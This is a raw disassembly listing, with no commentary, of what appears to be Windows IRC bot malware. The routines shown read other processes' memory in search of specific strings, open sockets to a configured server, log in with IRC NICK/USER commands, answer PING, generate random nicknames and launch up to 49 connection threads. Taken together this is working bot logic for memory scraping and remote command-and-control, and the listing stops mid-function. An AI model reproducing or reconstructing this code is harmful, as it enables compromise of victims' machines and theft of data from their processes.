lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push [ebp+var_34]
mov [ebp+var_C], edi
push edi
push dword ptr [eax+18h]
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_4177A2
loc_4176F8: ; CODE XREF: sub_41761C+112�j
push edi ; Str2
push offset word_4D3830 ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jnz short loc_417720
lea eax, [edi+200h]
push eax ; Str2
push offset word_4D4030 ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jz short loc_417730
loc_417720: ; CODE XREF: sub_41761C+EB�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jnb short loc_4177A2
jmp short loc_4176F8
; ---------------------------------------------------------------------------
loc_417730: ; CODE XREF: sub_41761C+102�j
test edi, edi
jz short loc_4177A2
lea eax, [ebp+var_14]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_42711C ; FileTimeToLocalFileTime
test eax, eax
jz short loc_41776B
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_14]
push eax
call ds:dword_427118 ; FileTimeToSystemTime
test eax, eax
jz short loc_41776B
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_41776B: ; CODE XREF: sub_41761C+12B�j
; sub_41761C+13D�j
movzx eax, word ptr [edi+42Ch]
shr eax, 8
mov dword_4D4A54, eax
mov eax, [ebp+arg_0]
mov [ebp+var_10], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov dword_4D4A4C, eax
mov Src, edi
loc_4177A2: ; CODE XREF: sub_41761C+90�j
; sub_41761C+A2�j ...
push [ebp+arg_0]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
mov esi, [ebp+var_10]
loc_4177B3: ; CODE XREF: sub_41761C+74�j
push [ebp+var_4]
call ds:dword_427070 ; CloseHandle
pop edi
mov eax, esi
pop ebx
loc_4177C0: ; CODE XREF: sub_41761C+24�j
pop esi
leave
retn
sub_41761C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4177C3 proc near ; CODE XREF: sub_4172C1:loc_4173B9�p
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push [ebp+arg_0]
push 0
push 410h
call ds:dword_42708C ; OpenProcess
test eax, eax
mov [ebp+arg_0], eax
jz loc_4178B5
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
lea eax, [ebp+var_4C]
push eax
call ds:dword_427160 ; GetSystemInfo
mov ebx, [ebp+var_44]
mov eax, [ebp+var_40]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_4178AC
mov edi, ds:dword_427154
loc_41780E: ; CODE XREF: sub_4177C3+E3�j
lea eax, [ebp+var_28]
push 1Ch
push eax
push ebx
push [ebp+arg_0]
call ds:dword_427158 ; VirtualQueryEx
test eax, eax
jz short loc_41789A
mov edx, [ebp+var_18]
mov ecx, [ebp+var_1C]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_4178A0
test [ebp+var_13], 1
jnz short loc_4178A0
push ecx
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_427150 ; RtlAllocateHeap
mov esi, eax
lea eax, [ebp+var_8]
push eax
and [ebp+var_8], 0
push [ebp+var_1C]
push esi
push ebx
push [ebp+arg_0]
call ds:dword_42715C ; ReadProcessMemory
test eax, eax
jz short loc_41788C
push offset word_4D3830 ; Str2
push esi ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jnz short loc_41788C
lea eax, [esi+400h]
push offset word_4D4030 ; Str2
push eax ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jz short loc_4178BC
loc_41788C: ; CODE XREF: sub_4177C3+9F�j
; sub_4177C3+B0�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
jmp short loc_4178A0
; ---------------------------------------------------------------------------
loc_41789A: ; CODE XREF: sub_4177C3+5D�j
mov eax, [ebp+var_48]
mov [ebp+var_4], eax
loc_4178A0: ; CODE XREF: sub_4177C3+71�j
; sub_4177C3+77�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_41780E
loc_4178AC: ; CODE XREF: sub_4177C3+3F�j
push [ebp+arg_0]
call ds:dword_427070 ; CloseHandle
loc_4178B5: ; CODE XREF: sub_4177C3+1E�j
xor eax, eax
loc_4178B7: ; CODE XREF: sub_4177C3+134�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4178BC: ; CODE XREF: sub_4177C3+C7�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword_4D4A4C, ebx
mov Src, eax
cmp [eax], cl
jnz short loc_4178DE
cmp [eax+1], cl
jz short loc_4178E6
loc_4178DE: ; CODE XREF: sub_4177C3+114�j
; sub_4177C3+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_4178DE
loc_4178E6: ; CODE XREF: sub_4177C3+119�j
mov eax, [ebp+arg_4]
push [ebp+arg_0]
mov [eax], ecx
call ds:dword_427070 ; CloseHandle
push 1
pop eax
jmp short loc_4178B7
sub_4177C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4178F9 proc near ; CODE XREF: sub_4172C1+135�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_4D4A48
push esi
mov esi, ds:dword_427154
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax
push 8
call esi ; GetProcessHeap
push eax
call ds:dword_427150 ; RtlAllocateHeap
mov ecx, dword_4D4A48
mov [ebp+var_4], eax
add ecx, ecx
push ecx ; Size
push Src ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr dword_4D4A54
push eax
call dword_4D4834
push [ebp+var_4]
mov edi, offset byte_4D4840
push offset word_4D3830
push offset word_4D4030
push [ebp+arg_0]
push offset asc_4386C4 ; "-"
push 200h ; Count
push edi ; Dest
call __snprintf
add esp, 1Ch
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
mov eax, edi
pop edi
pop esi
leave
retn
sub_4178F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417990 proc near ; CODE XREF: sub_4172C1:loc_4173FD�p
var_18 = word ptr -18h
var_16 = word ptr -16h
Dst = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_4D4A48
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax
push 8
call ds:dword_427154 ; GetProcessHeap
push eax
call ds:dword_427150 ; RtlAllocateHeap
and [ebp+var_C], 0
mov [ebp+Dst], eax
mov ebx, offset word_4D4030
mov edi, 200h
mov esi, offset byte_4D3630
loc_4179D6: ; CODE XREF: sub_417990+FA�j
mov eax, dword_4D4A48
add eax, eax
push eax ; Size
push Src ; Src
push [ebp+Dst] ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call dword_4D4834
mov eax, dword_4D4A48
and [ebp+var_10], 0
mov ecx, [ebp+Dst]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_417A4B
loc_417A13: ; CODE XREF: sub_417990+B3�j
cmp [ebp+var_8], 0
jz short loc_417A68
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_417A37
cmp byte ptr [ecx+1], 0
jnz short loc_417A37
cmp dl, 20h
jnb short loc_417A31
and [ebp+var_8], 0
loc_417A31: ; CODE XREF: sub_417990+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_417A3B
loc_417A37: ; CODE XREF: sub_417990+90�j
; sub_417990+96�j
and [ebp+var_8], 0
loc_417A3B: ; CODE XREF: sub_417990+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_417A13
cmp [ebp+var_8], 0
jz short loc_417A68
loc_417A4B: ; CODE XREF: sub_417990+81�j
push [ebp+Dst]
push offset word_4D3830
push ebx
push [ebp+arg_0]
push offset asc_4386C4 ; "-"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 1Ch
jmp short loc_417A80
; ---------------------------------------------------------------------------
loc_417A68: ; CODE XREF: sub_417990+87�j
; sub_417990+B9�j
push offset word_4D3830
push ebx
push [ebp+arg_0]
push offset asc_438714 ; "-"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 18h
loc_417A80: ; CODE XREF: sub_417990+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_4179D6
push [ebp+Dst]
push 0
call ds:dword_427154 ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_417990 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417AA9 proc near ; CODE XREF: sub_417C61+2F�p
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_4CBA54 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_417B25
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_4]
call dword_4CB9D4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_4CBA14 ; inet_addr
cmp eax, esi
jnz short loc_417B0A
push [ebp+arg_0]
call dword_4CBA58 ; gethostbyname
test eax, eax
jz short loc_417B25
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_417B0A: ; CODE XREF: sub_417AA9+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_4CB97C ; connect
cmp eax, esi
jnz short loc_417B29
push edi
call dword_4CBA6C ; closesocket
loc_417B25: ; CODE XREF: sub_417AA9+1B�j
; sub_417AA9+58�j
mov eax, esi
jmp short loc_417B2B
; ---------------------------------------------------------------------------
loc_417B29: ; CODE XREF: sub_417AA9+73�j
mov eax, edi
loc_417B2B: ; CODE XREF: sub_417AA9+7E�j
pop edi
pop esi
leave
retn
sub_417AA9 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_417B2F(char *Dest)
sub_417B2F proc near ; CODE XREF: sub_401ACD+324C�p
; sub_401ACD+32B6�p ...
Dest = dword ptr 4
push esi
push edi
mov edi, [esp+8+Dest]
push offset asc_42A080 ; "\n"
push edi ; Dest
call _strcat
pop ecx
mov esi, offset dword_4D4A5C
pop ecx
loc_417B47: ; CODE XREF: sub_417B2F+42�j
cmp dword ptr [esi-4], 1
jnz short loc_417B65
cmp dword ptr [esi], 0
jbe short loc_417B65
push 0
push edi ; Str
call _strlen
pop ecx
push eax
push edi
push dword ptr [esi]
call dword_4CBA24 ; send
loc_417B65: ; CODE XREF: sub_417B2F+1C�j
; sub_417B2F+21�j
add esi, 210h
cmp esi, offset byte_4DB17C
jl short loc_417B47
pop edi
pop esi
retn
sub_417B2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417B76(char *Str,int)
sub_417B76 proc near ; CODE XREF: sub_417C61+155�p
Dst = byte ptr -420h
Dest = byte ptr -220h
Str2 = dword ptr -20h
var_1C = dword ptr -1Ch
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
mov esi, offset asc_42CDC0 ; " "
push edi
push esi ; Delim
push [ebp+Str] ; Str
call _strtok
pop ecx
mov [ebp+Str2], eax
pop ecx
lea edi, [ebp+var_1C]
push 7
pop ebx
loc_417B9B: ; CODE XREF: sub_417B76+35�j
push esi ; Delim
push 0 ; Str
call _strtok
mov [edi], eax
pop ecx
add edi, 4
dec ebx
pop ecx
jnz short loc_417B9B
mov esi, [ebp+var_1C]
xor edi, edi
cmp [ebp+Str2], edi
jnz short loc_417BC3
cmp esi, edi
jnz short loc_417BC3
push 1
pop eax
jmp loc_417C5C
; ---------------------------------------------------------------------------
loc_417BC3: ; CODE XREF: sub_417B76+3F�j
; sub_417B76+43�j
push [ebp+Str2] ; Str2
push offset aPing ; "PING"
call _strcmp
pop ecx
pop ecx
test eax, eax
push esi ; Str2
jnz short loc_417BDE
push offset aPongS_0 ; "PONG %s\n"
jmp short loc_417C2C
; ---------------------------------------------------------------------------
loc_417BDE: ; CODE XREF: sub_417B76+5F�j
push offset a433 ; "433"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_417BFF
push esi ; Str2
push offset a432 ; "432"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_417C5A
loc_417BFF: ; CODE XREF: sub_417B76+76�j
push 200h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417E84
add esp, 10h
lea eax, [ebp+Dst]
push eax
push offset aNickS_1 ; "NICK %s\n"
loc_417C2C: ; CODE XREF: sub_417B76+66�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dest]
push edi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
loc_417C5A: ; CODE XREF: sub_417B76+87�j
xor eax, eax
loc_417C5C: ; CODE XREF: sub_417B76+48�j
pop edi
pop esi
pop ebx
leave
retn
sub_417B76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C61 proc near ; DATA XREF: sub_417E06+61�o
Dest = byte ptr -4008h
var_3008 = byte ptr -3008h
Dst = byte ptr -2008h
Str = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 4008h
call __alloca_probe
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
imul esi, 210h
push 1
pop edi
lea eax, dword_4D4A64[esi]
mov dword_4D4A58[esi], edi
push dword_4D4C64[esi]
push eax
call sub_417AA9
pop ecx
xor ebx, ebx
cmp eax, edi
pop ecx
mov dword_4D4A5C[esi], eax
jb loc_417DE6
mov edi, 1000h
lea eax, [ebp+Dst]
push edi ; Size
push ebx ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Dst]
push eax ; Dest
call sub_417E84
lea eax, [ebp+Dest]
push eax ; Dest
call sub_417E84
lea eax, [ebp+var_3008]
push eax ; Dest
call sub_417E84
add esp, 18h
lea eax, [ebp+var_3008]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Str]
push offset aNickSUserSHotm ; "NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push dword_4D4A5C[esi]
call dword_4CBA24 ; send
push edi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_417D3D: ; CODE XREF: sub_417C61+111�j
; sub_417C61+180�j
push edi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Str]
push ebx
push edi
push eax
push dword_4D4A5C[esi]
call dword_4CB9EC ; recv
cmp eax, ebx
mov [ebp+var_8], eax
jle short loc_417DE6
xor eax, eax
cmp [ebp+var_8], ebx
mov [ebp+var_4], eax
jz short loc_417D3D
loc_417D74: ; CODE XREF: sub_417C61+17E�j
mov al, [ebp+eax+Str]
cmp al, 0Dh
jz short loc_417D9B
cmp al, 0Ah
jz short loc_417D9B
cmp [ebp+arg_0], 0FA0h
jz short loc_417D9B
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
mov [ebp+ecx+Dst], al
jmp short loc_417DD5
; ---------------------------------------------------------------------------
loc_417D9B: ; CODE XREF: sub_417C61+11C�j
; sub_417C61+120�j ...
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_417DD5
push dword_4D4A5C[esi] ; int
mov [ebp+eax+Dst], bl
lea eax, [ebp+Dst]
push eax ; Str
call sub_417B76
pop ecx
test eax, eax
pop ecx
ja short loc_417DE6
push edi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+arg_0], ebx
loc_417DD5: ; CODE XREF: sub_417C61+138�j
; sub_417C61+13F�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
mov [ebp+var_4], eax
jnz short loc_417D74
jmp loc_417D3D
; ---------------------------------------------------------------------------
loc_417DE6: ; CODE XREF: sub_417C61+40�j
; sub_417C61+107�j ...
mov dword_4D4A58[esi], ebx
mov esi, dword_4D4A5C[esi]
cmp esi, ebx
jbe short loc_417DFD
push esi
call dword_4CBA6C ; closesocket
loc_417DFD: ; CODE XREF: sub_417C61+193�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_417C61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417E06(char *Source,int,int)
sub_417E06 proc near ; CODE XREF: sub_401ACD+319B�p
var_8 = byte ptr -8
var_4 = dword ptr -4
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
mov [ebp+var_4], ebx
jle short loc_417E7F
loc_417E18: ; CODE XREF: sub_417E06+77�j
xor edi, edi
mov eax, offset dword_4D4A58
loc_417E1F: ; CODE XREF: sub_417E06+28�j
cmp [eax], ebx
jz short loc_417E30
add eax, 210h
inc edi
cmp eax, offset dword_4DB178
jl short loc_417E1F
loc_417E30: ; CODE XREF: sub_417E06+1B�j
cmp edi, 31h
jz short loc_417E7F
mov esi, edi
push [ebp+Source] ; Source
imul esi, 210h
lea eax, dword_4D4A64[esi]
push eax ; Dest
call _strcpy
mov eax, [ebp+arg_4]
pop ecx
mov dword_4D4C64[esi], eax
pop ecx
lea eax, [ebp+var_8]
mov dword_4D4A58[esi], 1
push eax
push ebx
push edi
push offset sub_417C61
push ebx
push ebx
call ds:dword_427084 ; CreateThread
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_417E18
loc_417E7F: ; CODE XREF: sub_417E06+10�j
; sub_417E06+2D�j
pop edi
pop esi
pop ebx
leave
retn
sub_417E06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417E84(char *Dest)
sub_417E84 proc near ; CODE XREF: sub_401ACD+36FD�p
; sub_401ACD+3747�p ...
Source = byte ptr -40h
var_2D = byte ptr -2Dh
Dst = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_18 = qword ptr -18h
Count = dword ptr -0Ch
var_4 = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push 14h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
call _rand
mov [ebp+Count], eax
fild [ebp+Count]
fmul ds:dbl_4276D8
call __ftol
cmp eax, 1
jnz short loc_417ECE
call _rand
call _rand
push 66h
cdq
pop ecx
idiv ecx
push off_438A68[edx*4]
jmp short loc_417EE7
; ---------------------------------------------------------------------------
loc_417ECE: ; CODE XREF: sub_417E84+2F�j
call _rand
call _rand
cdq
mov ecx, 0C0h
idiv ecx
push off_438768[edx*4] ; Source
loc_417EE7: ; CODE XREF: sub_417E84+48�j
lea eax, [ebp+Dst]
push eax ; Dest
call _strcpy
pop ecx
lea eax, [ebp+Dst]
pop ecx
push ebx
push esi
push edi
push eax ; Str
call _strlen
pop ecx
mov esi, eax
push 13h
mov [ebp+var_4], esi
pop eax
sub eax, esi
mov [ebp+Count], eax
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276D0
call __ftol
mov ebx, eax
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul ds:dbl_4276C8
call __ftol
cmp esi, 2
mov edi, offset a__1 ; "-|`_\\{[]}"
jle short loc_417F5A
cmp esi, 3
jnz short loc_417F51
cmp ebx, 1
jz short loc_417F5A
loc_417F51: ; CODE XREF: sub_417E84+C6�j
cmp eax, 1
jnz loc_418014
loc_417F5A: ; CODE XREF: sub_417E84+C1�j
; sub_417E84+CB�j
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276C0
call __ftol
push off_438A68[eax*4] ; Source
lea eax, [ebp+Source]
push eax ; Dest
call _strcpy
movsx eax, [ebp+esi+var_2D]
lea ebx, [ebp+esi+Dst]
push eax ; Val
push edi ; Str
call _strchr
add esp, 10h
test eax, eax
jnz short loc_418001
movsx eax, [ebp+Source]
push eax ; Val
push edi ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jnz short loc_418001
call _rand
mov dword ptr [ebp+var_18+4], eax
dec esi
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], esi
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_4276C8
call __ftol
cmp eax, 1
jnz short loc_418001
push edi ; Str
call _strlen
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-8]
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-8]
fmul ds:dbl_4276C8
call __ftol
mov al, byte ptr a__1[eax] ; "-|`_\\{[]}"
mov [ebx], al
loc_418001: ; CODE XREF: sub_417E84+111�j
; sub_417E84+122�j ...
push [ebp+Count] ; Count
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dst]
push eax ; Dest
call _strncat
add esp, 0Ch
loc_418014: ; CODE XREF: sub_417E84+D0�j
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
mov esi, eax
movsx eax, [ebp+esi+var_2D]
lea ebx, [ebp+esi+Dst]
push eax ; C
mov [ebp+var_4], esi
call _isdigit
pop ecx
test eax, eax
pop ecx
jnz loc_41827C
and [ebp+Count], eax
movsx eax, byte ptr [ebx-1]
push eax ; Val
push edi ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jnz loc_418173
call _rand
mov dword ptr [ebp+var_18+4], eax
lea eax, [esi+3]
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_4276C8
call __ftol
cmp esi, 3
jz short loc_418082
cmp eax, 1
jnz loc_418173
loc_418082: ; CODE XREF: sub_417E84+1F3�j
push 2
cdq
pop ecx
idiv ecx
cmp edx, 1
jnz short loc_4180C4
push edi ; Str
call _strlen
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-10h]
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-10h]
fmul ds:dbl_4276C8
call __ftol
mov al, byte ptr a__1[eax] ; "-|`_\\{[]}"
mov [ebx], al
jmp short loc_4180E0
; ---------------------------------------------------------------------------
loc_4180C4: ; CODE XREF: sub_417E84+207�j
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276B8
call __ftol
mov cl, 41h
sub cl, al
mov [ebx], cl
loc_4180E0: ; CODE XREF: sub_417E84+23E�j
push 1
inc esi
pop ebx
mov [ebp+var_4], esi
mov [ebp+Count], ebx
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276B0
call __ftol
cmp esi, 3
jz short loc_418109
cmp eax, ebx
jnz short loc_418173
loc_418109: ; CODE XREF: sub_417E84+27F�j
push 2
pop ebx
cdq
mov ecx, ebx
idiv ecx
test edx, edx
jnz short loc_41814E
push edi ; Str
call _strlen
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-10h]
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-10h]
fmul ds:dbl_4276C8
call __ftol
mov al, byte ptr a__1[eax] ; "-|`_\\{[]}"
mov [ebp+esi+Dst], al
jmp short loc_41816C
; ---------------------------------------------------------------------------
loc_41814E: ; CODE XREF: sub_417E84+28F�j
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276B8
call __ftol
mov cl, 41h
sub cl, al
mov [ebp+esi+Dst], cl
loc_41816C: ; CODE XREF: sub_417E84+2C8�j
inc esi
mov [ebp+Count], ebx
mov [ebp+var_4], esi
loc_418173: ; CODE XREF: sub_417E84+1C9�j
; sub_417E84+1F8�j ...
cmp esi, 6
jge loc_4181FC
cmp esi, 5
jge short loc_418194
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276D0
jmp short loc_4181B2
; ---------------------------------------------------------------------------
loc_418194: ; CODE XREF: sub_417E84+2FB�j
call _rand
push 8
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
pop eax
sub eax, esi
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_4276C8
loc_4181B2: ; CODE XREF: sub_417E84+30E�j
call __ftol
test eax, eax
jnz short loc_4181D5
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276A8
call __ftol
mov cl, 30h
jmp short loc_4181F2
; ---------------------------------------------------------------------------
loc_4181D5: ; CODE XREF: sub_417E84+335�j
cmp eax, 1
jnz short loc_4181FC
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276B8
call __ftol
mov cl, 41h
loc_4181F2: ; CODE XREF: sub_417E84+34F�j
sub cl, al
mov [ebp+esi+Dst], cl
inc esi
mov [ebp+var_4], esi
loc_4181FC: ; CODE XREF: sub_417E84+2F2�j
; sub_417E84+354�j
cmp [ebp+Count], 2
jge short loc_41827C
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul ds:dbl_4276C8
call __ftol
cmp eax, 1
jnz short loc_41827C
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276A8
call __ftol
mov cl, 30h
sub cl, al
mov [ebp+esi+Dst], cl
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_4276A0
call __ftol
cmp eax, 1
jnz short loc_41827C
cmp [ebp+Count], eax
jge short loc_41827C
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_427698
call __ftol
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2B], cl
loc_41827C: ; CODE XREF: sub_417E84+1B1�j
; sub_417E84+37C�j ...
lea eax, [ebp+Dst]
push 14h ; Count
push eax ; Source
push [ebp+Dest] ; Dest
call _strncpy
mov eax, [ebp+Dest]
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_417E84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418295(int,int,void *Buf2,size_t Size)
sub_418295 proc near ; CODE XREF: sub_4182CD+125�p
; sub_4182CD+14C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Buf2 = dword ptr 10h
Size = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+Size]
test edi, edi
jle short loc_4182C3
loc_4182A6: ; CODE XREF: sub_418295+2C�j
push [ebp+Size] ; Size
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+Buf2] ; Buf2
push eax ; Buf1
call _memcmp
add esp, 0Ch
test eax, eax
jz short loc_4182C9
inc esi
cmp esi, edi
jl short loc_4182A6
loc_4182C3: ; CODE XREF: sub_418295+F�j
xor al, al
loc_4182C5: ; CODE XREF: sub_418295+36�j
pop edi
pop esi
pop ebp
retn
